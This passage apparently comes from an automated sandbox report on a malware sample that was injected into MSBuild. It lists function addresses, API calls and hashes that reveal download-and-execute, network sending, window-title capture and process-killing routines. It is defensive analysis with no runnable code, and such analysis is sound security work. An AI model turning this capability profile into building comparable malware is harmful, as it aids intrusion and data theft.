                                                                                                                        • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3446828153-0
                                                                                                                        • Opcode ID: 2746618531f85624d519dcfad62fa3fd490632c023c0ce94cdd3baf9e7c67748
                                                                                                                        • Instruction ID: d4a312bc08deb00524ad4f96a22c8b91b804439ffc6ddefb5fa2deb2480904ec
                                                                                                                        • Opcode Fuzzy Hash: 2746618531f85624d519dcfad62fa3fd490632c023c0ce94cdd3baf9e7c67748
                                                                                                                        • Instruction Fuzzy Hash: 31F0B431104201EAD310AB61FC06AFA3768EB50301F10887FFC49C20B2DB3498859A5D
                                                                                                                        Function 0041246E Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                                                        • RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3677997916-0
                                                                                                                        • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                        • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                                                        • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                        • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                                                        Function 00409517 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: xAG
                                                                                                                        • API String ID: 176396367-2759412365
                                                                                                                        • Opcode ID: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                                                                                                        • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                                                                                                                        • Opcode Fuzzy Hash: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                                                                                                        • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                                                                                                                        Function 00415250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 0041526E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExecuteShell
                                                                                                                        • String ID: open
                                                                                                                        • API String ID: 587946157-2758837156
                                                                                                                        • Opcode ID: c8674de7ec00f2757910a9bb23fdc902d0f1d7b475bfa7c08172f7d7b9988c4f
                                                                                                                        • Instruction ID: a717779756fc853709bdab9af9b60c22d435cd15da1241abc9879386ec2ea144
                                                                                                                        • Opcode Fuzzy Hash: c8674de7ec00f2757910a9bb23fdc902d0f1d7b475bfa7c08172f7d7b9988c4f
                                                                                                                        • Instruction Fuzzy Hash: 34E012712043459AD214FAB1ECD5EFF73A9EB90314F00483FB90A520E2EE789949D669
                                                                                                                        Function 0041A945 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A959
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: GlobalMemoryStatus
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 1890195054-2766056989
                                                                                                                        • Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                        • Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
                                                                                                                        • Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                        • Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
                                                                                                                        Function 00415749 Relevance: 3.1, APIs: 2, Instructions: 63sleepfilenetworkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00415745
                                                                                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004157A7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DownloadFileSleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1931167962-0
                                                                                                                        • Opcode ID: f0d74c9974317fc6269dedc451d9e10ff7ba908a7b2bc5488c8a7cbda813a619
                                                                                                                        • Instruction ID: 2166b22bc077c02c1b93db8cb301ccfdac2f33cb5c0e2722be81623e7165673a
                                                                                                                        • Opcode Fuzzy Hash: f0d74c9974317fc6269dedc451d9e10ff7ba908a7b2bc5488c8a7cbda813a619
                                                                                                                        • Instruction Fuzzy Hash: A81198315043019BC614FB72DC969FE73A9EF90318F00497FF846A31E2EE389949C69A
                                                                                                                        Function 0044B9BE Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 0044B9DF
                                                                                                                          • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                        • RtlReAllocateHeap.NTDLL(00000000,00475D30,?,00000004,00000000,?,0044E90A,00475D30,00000004,?,00475D30,?,?,00443125,00475D30,?), ref: 0044BA1B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap$_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1482568997-0
                                                                                                                        • Opcode ID: 5cfe77718a578226d9c79b09a3ca5d66c4b9dac56741ea3d957ce73d3817e4be
                                                                                                                        • Instruction ID: 12956794463f81a5c067cbc08b9f94d22fea268b9007f3edb04f63306941b305
                                                                                                                        • Opcode Fuzzy Hash: 5cfe77718a578226d9c79b09a3ca5d66c4b9dac56741ea3d957ce73d3817e4be
                                                                                                                        • Instruction Fuzzy Hash: D6F0F67210051167FF212A27AC01B6B2B2CDFC27B1F15012BFA18AA292DF6CCC0191EE
                                                                                                                        Function 004041F1 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                                          • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateEventStartupsocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1953588214-0
                                                                                                                        • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                        • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                                                        • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                        • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                                                        Function 0043360D Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                                                                          • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,00434411,?,?,?,?,?,?,?,?,00434411,?,0046D644,0041AD75,?), ref: 00437C37
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3476068407-0
                                                                                                                        • Opcode ID: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                                                                                                        • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                                                                                        • Opcode Fuzzy Hash: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                                                                                                        • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                                                                                        Function 0041AC52 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32 ref: 0041AC74
                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC87
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ForegroundText
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 29597999-0
                                                                                                                        • Opcode ID: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                                                        • Instruction ID: 3cf16c2a8257e52241c70e3f2477159e0ff99a2dafdd86ddfb3cfc0a4d760bbd
                                                                                                                        • Opcode Fuzzy Hash: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                                                        • Instruction Fuzzy Hash: 56E04875A0031467EB24A765AC4EFDA766C9704715F0000B9BA19D21C3E9B4EA04CBE4
                                                                                                                        Function 00413F9A Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                                                                                                          • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                          • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                          • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                          • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                          • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                          • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                          • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                          • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1170566393-0
                                                                                                                        • Opcode ID: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                                        • Instruction ID: 9c65b6197a0e8ce5e429e224625e4c370c9a1848c9e97f9a588a6d75e163472b
                                                                                                                        • Opcode Fuzzy Hash: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                                        • Instruction Fuzzy Hash: 4ED05B326406216FB310575D6D01FFBB5DCDFA67617150077F408D7110D6945D82C3AD
                                                                                                                        Function 0041567A Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wave$CloseStop
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3638528417-0
                                                                                                                        • Opcode ID: cc729f51f58ac3675bc1b090fb4f27c21ae4d46a9f560f09fe8f0373d2393ce3
                                                                                                                        • Instruction ID: f291f111d3b55938ba5bd66d5a3b5313f014998fb7faa1113fe40cd21bfd9f38
                                                                                                                        • Opcode Fuzzy Hash: cc729f51f58ac3675bc1b090fb4f27c21ae4d46a9f560f09fe8f0373d2393ce3
                                                                                                                        • Instruction Fuzzy Hash: E6E04F321181408AC314EB69F855AED77A1EB91305F01447EE40D824B2EB355589EB6A
                                                                                                                        Function 00414F36 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • StrToIntA.SHLWAPI(00000000,00000000), ref: 00414F49
                                                                                                                          • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoParametersSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3098949447-0
                                                                                                                        • Opcode ID: 8db13b7f98342a5fd383609f648f4d13f07d60eadb5b6f450f9b70bcb90dc376
                                                                                                                        • Instruction ID: 16af9778d2dab026e44fd182aff3595c44448f688ab1221e4f47f4f5b7710ba8
                                                                                                                        • Opcode Fuzzy Hash: 8db13b7f98342a5fd383609f648f4d13f07d60eadb5b6f450f9b70bcb90dc376
                                                                                                                        • Instruction Fuzzy Hash: AE01043160430086C614FB72D496AEE73E19FD4718F40497FF846A75E2EF38A949C79A
                                                                                                                        Function 00415020 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,0000000A), ref: 00415027
                                                                                                                          • Part of subcall function 0040E6A3: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                                          • Part of subcall function 0040E6A3: Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                                          • Part of subcall function 0040E6A3: Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process32$CreateCurrentFirstNextProcessSnapshotToolhelp32send
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 199960123-0
                                                                                                                        • Opcode ID: 7d37b22ed79db166fac1ecbb96aa7f785b78fd7a87083166bdf0c8386595dcff
                                                                                                                        • Instruction ID: 38e1ea502710b120ae7c3f9edb738cb9f03b37d5bda28388bee33bdc26f80029
                                                                                                                        • Opcode Fuzzy Hash: 7d37b22ed79db166fac1ecbb96aa7f785b78fd7a87083166bdf0c8386595dcff
                                                                                                                        • Instruction Fuzzy Hash: B90144726082004BC214F675E896AAEB3E4EBD0304F50483FF945931D1EF789949869A
                                                                                                                        Function 0041517D Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetWindowTextW.USER32(00000000,00000000), ref: 004151AA
                                                                                                                          • Part of subcall function 00416A68: EnumWindows.USER32(Function_00016751,00000000), ref: 00416A80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumTextWindowWindows
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2480600497-0
                                                                                                                        • Opcode ID: 747c7ca23bad4a1a10c94cee9fb387aed1bdaa77efd33e78d724e030e8ced7dc
                                                                                                                        • Instruction ID: a8c1eb5ea3412325c7836402fc4d3de0a1ddbf8df3531501c40fc1e27f2746ac
                                                                                                                        • Opcode Fuzzy Hash: 747c7ca23bad4a1a10c94cee9fb387aed1bdaa77efd33e78d724e030e8ced7dc
                                                                                                                        • Instruction Fuzzy Hash: C4F012315043419AC614FB72D856AFE73A59F90314F40883FB846A60E2EF789949C69A
                                                                                                                        Function 00446AFF Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                                                        • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                                                                        • Opcode Fuzzy Hash: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                                                        • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                                                                        Function 00415145 Relevance: 1.5, APIs: 1, Instructions: 29threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00415164
                                                                                                                          • Part of subcall function 0041AD19: OpenProcess.KERNEL32(00000001,00000000,00000000,?,?,0041509E,00000000), ref: 0041AD21
                                                                                                                          • Part of subcall function 0041AD19: TerminateProcess.KERNEL32(00000000,00000000,?,?,0041509E,00000000), ref: 0041AD2F
                                                                                                                          • Part of subcall function 0041AD19: CloseHandle.KERNEL32(00000000,?,?,0041509E,00000000), ref: 0041AD3B
                                                                                                                          • Part of subcall function 00416A68: EnumWindows.USER32(Function_00016751,00000000), ref: 00416A80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseEnumHandleOpenTerminateThreadWindowWindows
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2526979043-0
                                                                                                                        • Opcode ID: 648fc26301d47bcce6d80af6544e93fc3e0cd09ee4d06a691a7f7435400b9598
                                                                                                                        • Instruction ID: b05455b57e7b0bef87b9695cb18fe303039b29ce9b6afb21aeb883f1c56ff91e
                                                                                                                        • Opcode Fuzzy Hash: 648fc26301d47bcce6d80af6544e93fc3e0cd09ee4d06a691a7f7435400b9598
                                                                                                                        • Instruction Fuzzy Hash: DFF0373114434096C514FBB2D856AFE73A9EF90314F10493FF945930E2DF389955C65A
                                                                                                                        Function 00415141 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(00000000,00000000,00000003), ref: 0041512E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ShowWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1268545403-0
                                                                                                                        • Opcode ID: 8801704c176822a39b4d6cd667888b303d44f9d2b05b47cb9807332c3350d1bb
                                                                                                                        • Instruction ID: 478be8ff441214b3a5c9b97e177def518a8b57326db61f46b7c8e0227de354c4
                                                                                                                        • Opcode Fuzzy Hash: 8801704c176822a39b4d6cd667888b303d44f9d2b05b47cb9807332c3350d1bb
                                                                                                                        • Instruction Fuzzy Hash: 45E0923114830096C114FB71E856BFE73A4AF90714F40483FF80A970E2EF789889C29A
                                                                                                                        Function 00415139 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(00000000,00000000,00000003), ref: 0041512E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ShowWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1268545403-0
                                                                                                                        • Opcode ID: a361d45f3908f1f40e44fe3b5b1926a7a151a7f26019c0223e209ed136dd6559
                                                                                                                        • Instruction ID: 0034518ddbccc6a27852650da3faa1cedc62a7c2b8847e5fdedca3bed852e860
                                                                                                                        • Opcode Fuzzy Hash: a361d45f3908f1f40e44fe3b5b1926a7a151a7f26019c0223e209ed136dd6559
                                                                                                                        • Instruction Fuzzy Hash: 55E0923124830096C114FB71E856BFE73A4AF90714F40483FF80A970E2EF789889C29A
                                                                                                                        Function 0041513D Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(00000000,00000000,00000003), ref: 0041512E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ShowWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1268545403-0
                                                                                                                        • Opcode ID: 2092a9dfdb060fbcb92c6eb666269d72f2d2259a0ad9446492407839e496863b
                                                                                                                        • Instruction ID: 0be16cab6edacd20e9e571eebac107012cf7170144a05da788fd32dfe1696584
                                                                                                                        • Opcode Fuzzy Hash: 2092a9dfdb060fbcb92c6eb666269d72f2d2259a0ad9446492407839e496863b
                                                                                                                        • Instruction Fuzzy Hash: E7E0923114830096C114FB71EC56BFE73A4AF90714F40483FF80A970E2EF789889C69A
                                                                                                                        Function 00415112 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(00000000,00000000,00000003), ref: 0041512E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ShowWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1268545403-0
                                                                                                                        • Opcode ID: 72be006c6fef3225065798f4425f5b9035b00571656ab388daf18467fb6f8f05
                                                                                                                        • Instruction ID: 6925553bea9c14164719a3d84184eb848672d29ec3025f6f87dd104ec2ec7084
                                                                                                                        • Opcode Fuzzy Hash: 72be006c6fef3225065798f4425f5b9035b00571656ab388daf18467fb6f8f05
                                                                                                                        • Instruction Fuzzy Hash: BAE0483114434096C514FB71E856BFE73A4EF90314F40483FF84A974E2EF789549C699
                                                                                                                        Function 004150ED Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CloseWindow.USER32(00000000), ref: 00415107
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2868366576-0
                                                                                                                        • Opcode ID: cefe351b4902a629c16a77e74900d8cf095d9daa3fc916039c56a2e56a6947e9
                                                                                                                        • Instruction ID: 51d836d651f70c7de7d7e96136ec3ff7ad66d234ad1b9695958841da982dd75b
                                                                                                                        • Opcode Fuzzy Hash: cefe351b4902a629c16a77e74900d8cf095d9daa3fc916039c56a2e56a6947e9
                                                                                                                        • Instruction Fuzzy Hash: 45E04F3110824086C614FBB2EC56AFE73A4EF90315F40483FF84A970E2EF389949C69A
